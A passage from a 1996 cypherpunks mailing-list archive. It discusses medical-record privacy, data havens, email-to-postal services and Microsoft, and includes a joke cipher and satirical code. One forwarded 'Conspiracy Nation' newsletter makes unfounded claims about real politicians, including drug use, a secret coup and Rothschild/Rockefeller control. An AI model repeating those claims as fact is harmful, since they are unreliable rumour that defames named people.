services are needed. (I can think of some solutions, such as "second
opinions" and "independent review panels," but, I can tell you, such things
are not common with psychotherapy regimens.)

>The doctor in question received a phone message with a 1-800
....
>about the patient's session in order to conduct a "utilization
>review to determine medical necessity."  Most alarmingly, the
>representative could be heard typing on a computer during the
>entire review.

Let's hope the resulting entries did not show up on a Web page!

(This has actually happened, accidentally. Only discovered when the search
spiders found the data and others then found the records.)

>The program went on to indicate that among the provisions in the
>most recent health insurance reform bill there was a provision
>for information sharing among insurance companies to facilitate
>the transfer of insurance policies when the insured switches
>jobs.  Among the more alarming suggestions in the legislation is
>the use of a "unique medical identifier."  Many of you will see
>this coming.  One of the currently proposed "identifiers" is the
>Social Security Number.

First, Clinton's dormant Health Plan (her husband is not pushing it)
would've _required_ such cross-linking of records. My friend the
psychotherapist is a liberal, but was aghast at this and lobbied with his
fellow mental health care professionals against this. He also got PGP as a
result of this scare.

Second, the "Social Security Number" worry is misplaced. They _already_
have enough identifiers to cross-link records til the cows come home.
Thinking one is safe if  the SSN is not used is "ostrich security." The
real issue is having confidential medical or psychiatric or legal records
out of the containment of a trusted holder.

>Members of the list might also wish to consider that companies
>which self insure their employees for health benefits are
>entitled to all their medical records directly.

Indeed, when I was at Intel an engineer was outraged almost to the point of
quitting and filing a lawsuit when he learned that his "Human Relations"
bimbo in a cubicle down the hall had the details of his vasectomy.

I'm sure by now the news of his vasectomy is a hundred different file
system in a dozen different institutions. An Alta Vista search should turn
it up.

--Tim May

ObCrypto Relevance: One of the ways safes (the steel kind, not the
alternative to vasectomies kind) got stronger was not through imploring and
lecturing, as we in the crypto community do, but through _insurance_. Why?
A way to discount future costs/risks to the present. A merchant who has
never been robbed probably doesn't think about the security of his safe.
But his insurer does. And he says to the merchant: "The charge is $2000 a
year if you continue with your current safe, and $1000 a year if you get a
Mosler Titan-2 safe. Your call."

The same motivation is, I think, what will eventually get security and
crypto more widely used. A hospital sued for multiple millions because its
records got intercepted and placed on the Web will have its insurance
company rethinking policies and rates, and setting procedures for
protection of information. This will drive security in a way that lectures,
rules, and even scare stories will not.

Boycott "Big Brother Inside" software!
We got computers, we're tapping phone lines, we know that that ain't allowed.
---------:---------:---------:---------:---------:---------:---------:----
Timothy C. May              | Crypto Anarchy: encryption, digital money,
tcmay@got.net  408-728-0152 | anonymous networks, digital pseudonyms, zero
W.A.S.T.E.: Corralitos, CA  | knowledge, reputations, information markets,
Licensed Ontologist         | black markets, collapse of governments.
"National borders aren't even speed bumps on the information superhighway."








From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz	<alanh@infi.net>
Date: Mon, 19 Aug 1996 12:49:53 +0800
Subject: No Subject
Message-ID: <199608190239.WAA03658@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Aug 1996, Faun A. Skyles wrote:

> Are the typical "mom & pop" mail forwarding companies going to understand
> snail-mail gateways?  Some of them refuse to use a computer!

   Oh my God. A business that didn't computerize itself. Don't they know, 
that modern situational ethics require a business to place itself at the 
mercy of a computer, whether or not the old, manual systems were working 
JUST FINE.  And then they have to upgrade their hardare every two years, 
so that they can balance their checkbook in 256 colors. And then they 
have to upgrade to the latest version of WordPerfect every two years, 
whether or not the old typewriter and manila file folders were working 
JUST FINE.

Oh how superior we young squirts are to those antiquarians. Hey, let's 
sit around and make fun of them and criticize them.



> For example,
> many charge $2 - $3 to transcribe a telephone message for you, then they
> snail mail it to your next location.

    Oh my God. Charging the customer for each service rendered, so that
those who place demands on the time of the business - pay for it. Oh my
God, someone using the Postal System, which is still head-and-shoulder
above the Internet in universal accessibility on the road, entry costs and
security. Hey let's sit around and criticise that. After all, we don't 
want to admit that not every message in the world needs to be delivered 
to the recipient in ten minutes or less.





> It's pretty low-tech.  I'd like to offer a high-tech alternative.

    And who's stopping you? I've got ten dollars that says that you 
don't have the balls/intestinal fortitude to do it, and keep it going 
for  - oh, let's say the five years that the IRS uses to judge a 
business's profitability?




> My grandparents are still using old forms of communications too! 

   Well that's the final straw. What a useless and meaningless life they 
have. We couldn't admit or accept that they've got a completely happy 
life, could we.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 19 Aug 1996 13:31:38 +0800
To: Stephen Cobb <stephen@iu.net>
Subject: Re: US Taxes on X-Pats
In-Reply-To: <1.5.4.32.19960818182834.00bb88ac@iu.net>
Message-ID: <Pine.SV4.3.91.960818232317.3477E-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


As I understand the proposal, the immigrant-benefits thing would be for 
immigrants admitted AFTER the act was, uh, enacted. So, no ex-post-facto 
problems.




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz <alanh@infi.net>
Date: Mon, 19 Aug 1996 13:31:40 +0800
To: Mike McNally <m5@tivoli.com>
Subject: Re: CS First Boston lawsuit
In-Reply-To: <32178436.30E4@tivoli.com>
Message-ID: <Pine.SV4.3.91.960818232701.3477F-100000@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


I suspect they are trying to get a judgement against "John Doe", in the 
hopes of tracking him down later.

Actually, if I had a sizeable judgement against such a John Doe, I could 
probably find a private detective who would find the dude for a 
contingent fee. Wow, a whole new class of factoring (commerce definition) 
opens up. Get me a lawyer....




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Alan Horowitz	<alanh@infi.net>
Date: Mon, 19 Aug 1996 14:03:06 +0800
Subject: No Subject
Message-ID: <199608190352.XAA07594@larry.infi.net>
MIME-Version: 1.0
Content-Type: text/plain


On Aug 18, 96 11:12:16 am, Joel M Snyder, Now Overwhelmed Again wrote:

> Back to the original topic: email-to-snail-mail.  That's not hard,
> technologically.  The problem as I see it is billing.  If I were to offer
> such a service, I'd want to keep my cost to the consumer low, on the order
> of $0.75 to $1.00 per message, with marginal charges for additional pages. 
> I might possibly barely be able to find some slave labor to make a profit
> at doing it, IF I HAD THE VOLUME (which I probably wouldn't), but the
> overhead of setting up a billing arrangement with every TDH who wants to do
> it would eat the profits up instantly.  
> 
> It's difficult to conceive of a setup which a technomad would use in
> sufficient volumes to be cost-effective.  


How about the sender provides a Digicash e-cash payment for the
appropriate amount with each message, kind of like a electronic postage
stamp?  A script on the receiving side could automatically check the
payment amount, bouncing the message back to sender with an
"insufficient payment" message if necessary.  Or you could use a web
page to submit messages and payments.  Either way no one needs to worry
about billing, account tracking, etc.  Payment/billing is taken care of
immediately.  Of course, there is some overhead with the fees on e-cash,
but it probably would be more cost effective than other methods.


P.S. I have an alpha version of a program which may be of interest to
technomads: it automatically executes scripts received by email from a
remote machine and then mails back the results.  The scripts (shell
scripts, perl scripts, or whatever) are encrypted and signed with PGP
before being sent to provide security and prevent unauthorized users
from executing scripts on your machine.  The program runs on unix
systems, and submissions can be from anything that runs PGP and is able
to send email.  See:

  http://www.bmen.tulane.edu/~carpente/emscrypt/emscrypt.html

for more info.


--Matt

--
mcarpent@mailhost.tcs.tulane.edu    PGP mail preferred, finger for public key.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: an224850@anon.penet.fi (scythe)
Date: Mon, 19 Aug 1996 13:41:06 +0800
To: cypherpunks@toad.com
Subject: terrorists to hit Dem convention?
Message-ID: <9608190004.AA24526@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain




The following is brought to you thanks, in part, to the kind 
assistance of CyberNews and the fine folks at Cornell University.


              Conspiracy Nation -- Vol. 8  Num. 85
             ======================================
                    ("Quid coniuratio est?")
 
 
- -----------------------------------------------------------------
 
RUMOR MILL NEWS SERVICE #4
==========================
 
The Rumor Mill News  Service  is  edited by "RU".  The following,
from what I can tell, appears to be RUMOR ONLY.  What is more,  I
have  NO  IDEA  who  the  author  is;  I  received  the following
anonymously, with the promise of "more to come".
 
 +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +
 
                        HIT THE ROAD JACK!
                        ==================
                    Clinton Told to Step Aside
                   Before Democratic Convention
                   ----------------------------
                     The President Retaliates:
                       EXECUTIVE ORDER 13010
                     Creates Terrorist Gestapo
                   ----------------------------
                  CHICAGO BRACING FOR TERRORISTS!
                  -------------------------------
                Police State Reactivated In Chicago
                     Is The Nation Far Behind?
                -----------------------------------
         Will Clinton Use EO# 13010 To Declare Martial Law?
         --------------------------------------------------
 
Later this month, the  Democratic  Convention returns to Chicago.
When it was there in 1968, the country was  ablaze  in  anti-Viet
Nam  War  fever.   Anti-war  demonstrators  all  but  brought the
convention and Chicago to their knees.
 
In today's world,  demonstrators  are  labeled terrorists.  Armed
with today's stronger "label," the Chicago police are gearing  up
for a repeat performance of the Chicago 7 and "Brutalmania."
 
Terrorists have officially  replaced  demonstrators, according to
the  terrorist  bill  recently  passed  by   Congress.    As   an
accompaniment  to  the  terrorist  bill,  "Terrorist Bill" signed
Presidential Executive Order  13010,  the Critical Infrastructure
Protection Order.  This Presidential Order creates a special Task
Force called the Infrastructure Protection Task Force, IPTF.  The
sweeping array of power and information that will be provided  to
the  IPTF  makes  FEMA [Federal Emergency Management Association]
look like the Mouseketeers.
 
               -+- Effective Date August 17 -+-
 
The Presidential Order goes  into  effect August 17, just shortly
after the Republican Convention.   Speculation  exists  that  the
Terrorist  Gestapo  will  be  trotted out just in time to prevent
riots and terrorism in Chicago at the Democratic Convention.
 
As a result of the  expected terrorist threat, the Chicago police
superintendent has seen fit to restore all the old police powers,
powers that some citizens of Chicago say  bordered  on  a  police
state.
 
        -+- The Red Squad Joins The Terrorist Gestapo -+-
 
The infamous Chicago Police intelligence unit, the Red Squad, has
been  reactivated  and  given  an  all-encompassing  directive of
keeping the city  free  from  terrorist  activity.  The Red Squad
bears a striking resemblance, on a local level, to the  Terrorist
Gestapo  created  by  Presidential  Executive Order #13010, which
goes into effect on August  17.  The Democratic Convention begins
August 26.
 
Thanks to the new terrorist bill and the  Presidential  Executive
Order   on   protecting  the  critical  infrastructure,  the  new
handy-dandy terrorist label can  easily  fit almost anyone in any
situation.  Back in 1968, the police were slightly encumbered  by
the  Constitution  and "probable cause."  Under today's terrorist
bill, which was passed in  the  nick  of time to ensure terrorist
cooperation at the convention, the Chicago police no longer  have
to be hamstrung by the "outdated," "antiquated" Constitution.
 
"The  IPTF's  function  is  to  identify  and coordinate existing
expertise, inside and  outside  of  the  Federal Government."  In
Chicago, the  "existing  expertise"  is  the  Red  Squad.   Under
Executive  Order 13010 the IPTF, otherwise known as the Terrorist
Gestapo, is ordered to "provide, or facilitate and coordinate the
provision of, expert  guidance  to  critical infrastructures *to*
*detect*, *prevent*, *halt*, *or* *confine* *an* *attack*..."
 
Chicago is getting ready  to  declare  martial law to protect the
President and other members of the Democratic  party  while  they
are  at the convention.  They will coordinate all activities with
the Terrorist Gestapo.  The IPTF  has  been given the go-ahead to
detect, prevent,  halt  or  confine  an  attack.   All  executive
departments  and agencies have been ordered to cooperate with the
IPTF  and   provide   requested   assistance.   Furthermore,  all
executive departments and agencies have  been  ordered  to  share
information when "requested" by IPTF.
 
In   other  words,  the  Terrorist  Gestapo  has  been  given  an
all-encompassing power by Executive  Order  13010.  Anyone or any
agency or department that refuses a "request" made  by  the  IPTF
can   be   labeled  a  traitor  or  a  terrorist  and  prosecuted
accordingly.
 
This  Terrorist  Gestapo  force  will  parlay  its  power  into a
national police force.  The tap  dance  they  plan  on  doing  in
Chicago with the old Chicago Red Squad will be a trial run to see
how  much  they  can  get  away with in order to call up the next
round of Presidential Executive Orders and Directives.
 
         -+- Even the Sewer Covers Are Welded Shut -+-
 
To prevent terrorist  moles  from  infiltrating  any  part of the
convention, the police have even welded shut all the storm sewers
around the United Center in Chicago, the forum for the Democratic
Convention.
 
                -+- Step Down or Step Aside -+-
 
Does all  the  rapid  activity  in  the  Office  of  Presidential
Executive  Orders have anything to do with the secret White House
meeting which took place Saturday, August 3, 1996?
 
The meeting took place barely  a  day  and a half after President
Clinton raged at a Rose Garden  news  conference.   He  had  been
asked  if he had gone back on his word to pay the legal bills for
fired and then  prosecuted  White  House  Travel Office employee,
Billy Dale.  He bristled in anger and rage and began berating the
CBS correspondent who asked the  question.   As  his  temper  and
voice  rose,  Chief  of  Staff  Leon Panetta was seen frantically
waving to  press  aides  to  end  the  news  conference.   As the
President's staff tried to herd him back into the safety  of  the
Oval Office, the President was heard screaming at the media.
 
Could the reason for this uncharacteristic outburst of temper and
rage have been that the President knew that 10 of the top leaders
of  the  Democratic  party  were planning on ordering him to step
down or step aside,  and  do  it  two  days before the Democratic
Convention begins in Chicago?
 
RMNews sources from the  Chicago  and  Washington  stations  have
reported  that  the  secret  meeting  was  chaired  by former DNC
Chairman and Ambassador to  Russia, Robert Strauss.  Mr. Strauss,
who vehemently denies being at the  meeting,  is  considered  the
ranking elder statesman of the Democratic party.
 
Strauss  and  his  gang  of  10  high-ranking  Democratic leaders
allegedly told Clinton  that  the  gathering storm of indictments
and revelations against  Hillary  would  destroy  the  Democratic
Party.
 
The  President  was  shown  a  photograph of the upcoming federal
criminal indictment which accuses  her of perjury and obstruction
of justice.
 
The President shouted in rage  that  they  were  all  "traitors."
Knowing that Executive Order 13010 had just created the Terrorist
Gestapo,  the  President's  angry use of the word traitor carried
sinister and potentially deadly overtones to the 10 brave men who
are risking their careers and lives to save the Democratic Party.
 
Countering  Clinton's  raging  outburst  with  one  of  his  own,
Ambassador Strauss reportedly smashed  an  ashtray on a desk near
the President and shouted, "You use cocaine and liquor.  You  are
unfit  to  deal  with  worldwide  emergencies."   The   President
screamed back at Strauss with a string of obscenities and curses.
Strauss  fired  back that the President is acting deranged and as
such could be removed by the 25th Amendment to the Constitution.
 
Strauss allegedly ordered the President to resign his  office  or
to declare before the Democratic Convention that he does not wish
to  be  nominated  for  a  second  term.  The President has never
officially declared that he is a candidate for the Presidency.
 
Of course, since, as already noted, Strauss  denies  having  been
present  in person at the August 3rd meeting, he presumably would
also deny having smashed  down  an  ashtray,  having engaged in a
shouting match with President Clinton, etc.
 
Prior to the secret meeting, the "Gang of 10," with  the  aid  of
others,  have  secretly  arranged  for  damaging  stories  on the
president and his wife to leak out.
 
One   story  was  already  leaked  by  the  Director  of  Central
Intelligence,  John  Deutch.    The   CIA  Director  ordered  the
Inspector General to investigate claims  that  U.S.  Intelligence
Agencies  were  involved  in  illegal  arms  shipments  and  drug
smuggling  at  an  isolated airstrip in Mena, Arkansas during the
years that  Bill  Clinton  was  Governor.   Susan  Schmidt of the
Washington Post broke the story on  August 7, four days after the
secret White House ultimatum.  [CN:  Late breaking:   Deutch  now
says  he wants to resign as DCIA and return to the Pentagon.  Did
trying to lift the lid on  Mena  expose him to too much hostility
within CIA?  Or perhaps,  as  suggested  by Linda Thompson, it is
"cross pollination" between CIA and the military.]
 
Clinton later sent word to the Gang  of 10 that he did not accede
to their demands.  He was then told that a floor fight would take
place at the Democratic Convention by prominent delegates.  These
delegates would charge him and the first lady with  participating
in  a  string of crimes and accuse them of damaging or destroying
the Democratic Party.
 
                -+- The Secret Trials Begin -+-
 
With the all-encompassing powers  given  to the Terrorist Gestapo
by Presidential Order 13010, "Terrorist Bill" has  the  power  to
"confine an attack."  The attack upon the Office of the President
is coming from loyal Democrats.  Using the power of the Executive
Order  that  he  just  signed, the President now has the power to
label any loyal Democrat a  traitor and a terrorist and "confine"
him in order  to  "halt"  his  upcoming  activities  against  the
President.   The  words  within the quotation marks are the exact
words taken from Executive Order 13010.
 
RMNews has reported that Chicago is run by the Rothschild family.
In that issue, Bill Clinton's illegitimate Rockefeller roots were
detailed.  The  deadly  feud  between  the  Rockefellers  and the
Rothschilds was also described.  Bill  Clinton,  the  politician,
was  created by his maternal grandfather, Winthrop Rockefeller, a
former governor of Arkansas.   He  was  promoted and supported by
the Rockefellers.   But  even  the  Rockefellers  have  seen  the
writing  on  the  wall.   Bill Clinton is a disaster for America.
Four more  years  of  Clinton  and  his  wife  could  destroy the
Rockefeller base in America.
 
It could bring down the illegal Federal Reserve, abolish the  IRS
and  create  full-scale warfare in the streets of America.  While
limited riots and wars are always  good for business, the type of
war that a continued Clinton presidency could bring will  totally
devastate  and  destroy  the  Rockefeller  family, as well as all
other  wealthy  Americans.   In  other  words,  America  would be
leveled and possibly conquered by  an  outside  power.   If  this
outside  power  is backed by the blood enemy of the Rockefellers,
the Rothschilds, there  is  little  doubt  that  any  of the vast
Rockefeller fortune would be spared.  More than likely  it  would
all be nationalized for the benefit of the state.
 
Sensing  the danger to themselves by their illegitimate creation,
the Rockefellers have seen fit to demand that Bill Clinton remove
himself from the office.  If  he  chooses  to fight them, he will
have the support of their enemies, the Rothschilds.   Could  that
be  the  real reason that the Democratic convention is being held
in Chicago this year?  Is the Chicago Red Squad owned outright by
the Rothschilds?  Will the Gang of 10 find themselves "confined,"
i.e., detained for questioning for the duration of the Democratic
Convention?
 
    RMNews Agency.  Serving Liberty and Freedom Worldwide.
 
 +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +  +
 
For reprints of  other  RMNews  editions,  send a self-addressed,
stamped envelope with 3 or more FRN's (Federal Reserve notes)  to
cover the cost of copying to:
RMNews Agency
PO Box 1784
Aptos, CA  95001-1784
Books and Tapes list also available.
 
- -----------------------------------------------------------------
       Views expressed do not necessarily  reflect  those
       of Conspiracy Nation, nor of its Editor in Chief.
- -----------------------------------------------------------------
     I encourage distribution of "Conspiracy Nation."
- -----------------------------------------------------------------
If you would like "Conspiracy Nation" sent to your e-mail 
address, send a message in the form "subscribe cn-l My Name" to 
listproc@cornell.edu          (Note: that is "CN-L" *not* "CN-1")
- -----------------------------------------------------------------
    For information on how to receive the improved Conspiracy 
  Nation Newsletter, send an e-mail message to bigred@shout.net
- -----------------------------------------------------------------
Want to know more about Whitewater, Oklahoma City bombing, etc? 
(1) telnet prairienet.org (2) logon as "visitor" (3) go citcom
- -----------------------------------------------------------------
       See also: http://www.europa.com/~johnlf/cn.html
- -----------------------------------------------------------------
          See also: ftp.shout.net  pub/users/bigred
- -----------------------------------------------------------------
Aperi os tuum muto, et causis omnium filiorum qui pertranseunt.
Aperi os tuum, decerne quod justum est, et judica inopem et 
  pauperem.                    -- Liber Proverbiorum  XXXI: 8-9 



- -> Send "subscribe   snetnews " to majordomo@alterzone.com
- ->  Posted by: Brian Redman <bigred@duracef.shout.net>


--****ATTENTION****--****ATTENTION****--****ATTENTION****--***ATTENTION***
Your e-mail reply to this message WILL be *automatically* ANONYMIZED.
Please, report inappropriate use to                abuse@anon.penet.fi
For information (incl. non-anon reply) write to    help@anon.penet.fi
If you have any problems, address them to          admin@anon.penet.fi




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Vipul Ved Prakash <vipul@pobox.com>
Date: Mon, 19 Aug 1996 18:43:26 +0800
To: gary@systemics.com (Gary Howland)
Subject: Re: Billy boy's satellites [Was - Floating DataHaven]
In-Reply-To: <321446BF.20431CA7@systemics.com>
Message-ID: <199608190016.AAA00419@fountainhead.net>
MIME-Version: 1.0
Content-Type: text


> 
> Vincent Cate wrote:
>  
> > You can get Internet via radio links for reasonable prices.  And via
> > satellite for almost affordable prices.  When Bill Gates 900 satellites
> > get up there it should be very affordable.
> 
> ... if a tad unrealiable?
> 
> The thought of 900 satelites in low orbit, all running NT, makes me
> shudder.  Brings a new meaning to the expression "OS crash".
> 
> What are cypherpunks thoughts on this?  Who really believes it'll work?
> 
> Doesn't the low orbit part mean that the satellites will have a low life
> expectancy, meaning a new launch every couple of days? (where's Gerald
> Bull when you need him - oh yes, now I remember ...)

The Iridium Project was pretty neat in this respect. I don't know what
is happenning with it as of now. It had some 230+ satellites, and some
smart routing techniques, if a satellite goes down. 

Vipul
vipul@pobox.com






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Black Unicorn <unicorn@schloss.li>
Date: Mon, 19 Aug 1996 14:30:47 +0800
To: cypherpunks@toad.com
Subject: "Utilization Review"
Message-ID: <Pine.SUN.3.94.960819002043.18087A-100000@polaris>
MIME-Version: 1.0
Content-Type: text/plain



I listened with horror this evening to a radio program which 
discussed the state of medical record privacy today.

In one segment a doctor (psychologist) described an experience 
she had after a session which was covered by the patient's 
insurance plan.

The doctor in question received a phone message with a 1-800 
number and the request to return the call.  On returning it she 
was connected with a very polite representative of the insurance 
company (who apparently had some experience in mental health, but 
not a M.D.) who proceeded to ask the most sensitive questions 
about the patient's session in order to conduct a "utilization 
review to determine medical necessity."  Most alarmingly, the 
representative could be heard typing on a computer during the 
entire review.

The program went on to indicate that among the provisions in the 
most recent health insurance reform bill there was a provision 
for information sharing among insurance companies to facilitate 
the transfer of insurance policies when the insured switches 
jobs.  Among the more alarming suggestions in the legislation is 
the use of a "unique medical identifier."  Many of you will see 
this coming.  One of the currently proposed "identifiers" is the 
Social Security Number.

Members of the list might also wish to consider that companies 
which self insure their employees for health benefits are 
entitled to all their medical records directly.

The prospect of cradle to grave medical files as an everyday 
reality in the United States is but around the corner.

In my view it is time for the foundation of an offshore insurance 
company which recognizes the basic tenant that client medical 
records are the property of the client, used in a license 
capacity at the pleasure of the insured, and not an entitlement 
to which the company is automatically privy.


--
I hate lightning - finger for public key - Vote Monarchist
unicorn@schloss.li





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: mccoy@communities.com (Jim McCoy)
Date: Mon, 19 Aug 1996 17:36:38 +0800
To: cypherpunks@toad.com
Subject: Re:Why BlackNet *IS* a Data Haven
Message-ID: <v02140b00ae3dd1760748@[204.179.131.64]>
MIME-Version: 1.0
Content-Type: text/plain


Tim May writes:
> Without splitting too many semantic hairs about the precise definition of
> "data haven," let me examine some ways in which BlackNet behaves
> identically to a conventional data haven.

I would be willing to concede the point if you would take a few seconds
to examine the issue of complete lack of persistence in BlackNet.

Your descriptions of BlackNet as a data haven seem to be completely
based upon the presumption that an anonymous contact service and contract
exchange is the functional equivalent to a data haven.  Here are a few
reasons why I would disagree:

As a publisher of "naughty bits" I do not have the ability to just toss
data up and assume that it will be there when someone wants it.  I am forced
to continuously monitor the appropriate newsgroups to find messages from
people asking me to post the blueprints to the orbital mind control lasers
or kiddie porn.  I cannot put my data onto "the Net" with an expectation
that any arbitrary user will be able to get the bits one month later.  To
maintain persistence I need to constantly repost my data, making it easier
for authorities to trace me through simple taffic analysis if nothing else.

> The classical data haven is closely identified with "place." To many
> people, they naturally assume "data haven" = a haven for data, a "harbor"
> (same IE root as haven) = a physical place.
>
> But is "place" important?

No one has really claimed place is important, in fact the ideal data haven
has no physical existence whatsoever.  This is a given.  As a practical
matter it is a lot easier if you start off in a "place" because there are
fewer complications but this has never been a necessity.

> A person in the U.S. seeking the Necronomicon posts a message to BlackNet
> (or any similar forum, using the same methods) asking for a copy of it, or
> offering to pay for it. (Whether the information is free or for a fee is
> not central to the idea.) This request is, of course, untraceable.
>
> Anyone, anywhere in the world, with a copy of this banned material on his
> or her private machines may see this request and respond, either giving the
> material away, or negotiating a fee. (As I said before, the absence of a
> robust digital cash system, bidirectionally untraceable, is a known
> limitation of all such systems.)

Now you reveal the objection I had to BlackNet being a data haven.  What if
only one person has a copy of this banned material?  It may not be in this
publishers interest to have the data available to anyone for posting in
response to the query ("Information does not want to be free, it wants to
be expensive and liberated...") and some data is not widespread enough or of
interest to enough people to assume that multiple copies exist to those who
read BlackNet postings. Therefore the only way for a publisher to maintain
availability of their data is to constantly monitor the appropriate newsgroups
and republish for each request, persistence is maintained only through
eternal vigilence (much like liberty, only requiring a lot more effort :)

> It's a data haven.

No, it is an anonymous contact service.  To claim this is a data haven is
like claiming that the classified ads in a newspaper are the equivalent to
a mall; you could probably find the same goods if you looked long enough, but
there is a reason that manufacturers sell goods through stores rather than
just posting classified ads across the country.  When one does not have the
time to check the classified ads, wants to goods from a reputable source, and
wants the goods in a timely fashion they will go to a shopping center.

jim






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: admin@anon.penet.fi
Date: Mon, 19 Aug 1996 11:58:57 +0800
To: cypherpunks@toad.com
Subject: Anonymous info
Message-ID: <9608182236.AA22590@anon.penet.fi>
MIME-Version: 1.0
Content-Type: text/plain


You have requested information about your account at anon.penet.fi.

Your code name is: <an611909@anon.penet.fi>
Your real e-mail address is: <cypherpunks@toad.com>
Your nickname is: <>
Your password is: <>

Regards,

	admin@anon.penet.fi





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adamsc@io-online.com (Adamsc)
Date: Mon, 19 Aug 1996 19:49:02 +0800
To: "cypherpunks" <nobody@replay.com>
Subject: Re: (null)
Message-ID: <19960819091932218.AAA178@IO-ONLINE.COM>
MIME-Version: 1.0
Content-Type: text/plain


On Sat, 17 Aug 1996 07:03:32 +0200 (MET DST), Anonymous wrote:

>>There are many computer companies that are full of Bozos,
>>Microsoft isn't one of them. Most of the people griping about
>>Microsoft can't code any better.

>Gee Phill, as I'm preparing to leave MS after 6 years, I have to 
>disagree with you.  Mediocrity and bureaucracy have eatten away 
>at a lot of the core of the company.  It is entirely marketing driven 
>now, and the coders have definitely gone down hill since I first
>started in Apps.  The "bozo" factor has steadily increased.  Only 
>those new hires without a sense of history think it's a real cool 
>place to work.  And, a few egocentric folks totally tripped on 
>power and greed.  (Apologies to any MSofties on the list I don't
>know personally.)

That would match my general impression of the way things have gone. 
Originally Microsoft was a small company that *had* to write good code
(anyone remember DR DOS?) to survive.  At the time, they had to do tons
of work producing usable products out of IBM's code. (Apparently due to
optimization, at one point MS was writing a negative total codelines for
OS/2 1.x)  Now, IBM is writing good code (Warp/Merlin/etc) and making
usable products out of MS blunders (Win-OS/2. It may crash (not quite as
much as the real Windows - separate sessions) but it doesn't bring down
the whole house...

>Talk to HR about the turnover of people with 5.5 to 8 years
>under their belts who are bailing with their stock options because
>it ain't a fun place to work anymore.  Testers, developers, UE,
>you name it.
>
>I can gripe because I was there.  I never seem to recall seeing
>your name on any internal e-mail.
>
>Oh yeah, this is coming through a remailer, because I'm reading
>the list at work.  And I doubt BillG would appreciate my opinions
>being sent out over MS resources.



| Chris Adams <adamsc@io-online.com> - Webpages for sale! Se habla JavaScript!
| http://www.io-online.com/adamsc/adamsc.htp
| Autoresponder: send email w/subject of "send resume" or "send PGPKEY"

 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: winsock@c2.org (WinSock Remailer)
Date: Mon, 19 Aug 1996 17:04:10 +0800
To: cypherpunks@toad.com
Subject: No Subject
Message-ID: <199608190658.XAA16050@infinity.c2.org>
MIME-Version: 1.0
Content-Type: text/plain



          DISCORDIAN SOCIETY SUPER SECRET CRYPTOGRAPHIC CYPHER CODE

Of possible interest to all Discordians, this information is herewith 
release
from the vaults of A.I.S.B., under the auspices of Episkopos Dr. Mordecai
Malignatius, KNS.

SAMPLE MESSAGE: ("HAIL ERIS")

CONVERSATION:
A B C D E F G H I J  K  L  M  N  O  P  Q  R  S  T  U  V  W  X  Y  Z
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26

STEP 1. Write out the message (HAIL ERIS) and put all the vowels at the end
        (HLRSAIEI)
STEP 2. Reverse order (IEIASRLH)
STEP 3. Convert to numbers (9-5-9-1-19-18-12-8)
STEP 4. Put into numerical order (1-5-8-9-9-12-18-19)
STEP 5. Convert back to letters (AEHIILRS)

This cryptographic cypher code is GUARANTEED TO BE 100% UNBREAKABLE.






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Theodor Schlickmann <73064.1247@compuserve.com>
Date: Mon, 19 Aug 1996 18:43:35 +0800
To: cypherpunks <cypherpunks@toad.com>
Subject: ETS Call
Message-ID: <960819081531_73064.1247_DHS31-2@CompuServe.COM>
MIME-Version: 1.0
Content-Type: text/plain


The European Commission  DGXIII/7 
Security of Telecommunications and Information Systems has anounced an open call
for tenders in the Official Journal as part of our preparatory work for ETS (the
Europe-wide network of Trusted Third Party Services).

The work proposed tackles the area of ETS infrastructure specification, design
and implementation in the form of field trials or "pilots" as well as performing
studies on communication and legal aspects.

>From the above data, further details of the Call can be found on our Web site:

http://www.cordis.lu/infosec/

For those who are unable to access the Web site, please send an e-mail request
to Fiona Allan at the following address:

fiona.allan@bxl.dg13.cec.be

The identical information will then be mailed to you using the normal postal
services.

After reading the documentation, please direct any queries that you may have to
Theodor Schlickmann at the following address:

73064.1247@compuserve.com

Kind regards

Theodor W. Schlickmann





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: attila <attila@primenet.com>
Date: Mon, 19 Aug 1996 14:28:55 +0800
To: Cypherpunks <cypherpunks@toad.com>
Subject: CypherPunk Insolence
Message-ID: <199608190425.WAA20936@InfoWest.COM>
MIME-Version: 1.0
Content-Type: text/plain



#include <stdio.h>
#include <signal.h>
 
void insolence()
{
    Discus unrelated central "Bellism" of your own ();  

    if ( gun_control_issue )
        respond to every message with the observation genetically
          superior tomatoes seem to play an important role ();
    else
        change_subject_again();

    process_threatening_messages();

    while (1)
    {
        if ( PerryGram )
            break;
        else
        {
            respond_to_all();
            argue_with_TCMay();
            continue;
        }
    }
}
  


--
Now, with a black jack mule you wish to harness, you walk up,
look him in the eye, and hit him with a 2X4 over the left eye.  
If he blinks, hit him over the right eye! 
He'll cooperate --so will politicians.





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Adam Back <aba@dcs.ex.ac.uk>
Date: Tue, 20 Aug 1996 09:15:05 +0800
To: eb@comsec.com
Subject: Re: CS8191 data sheet and ordering info...
In-Reply-To: <199608171837.LAA20948@comsec.com>
Message-ID: <199608190407.FAA00152@server.test.net>
MIME-Version: 1.0
Content-Type: text/plain



Eric Blossom <eb@comsec.com> (CSC) writes:
> 
>                 Communication Security Corporation
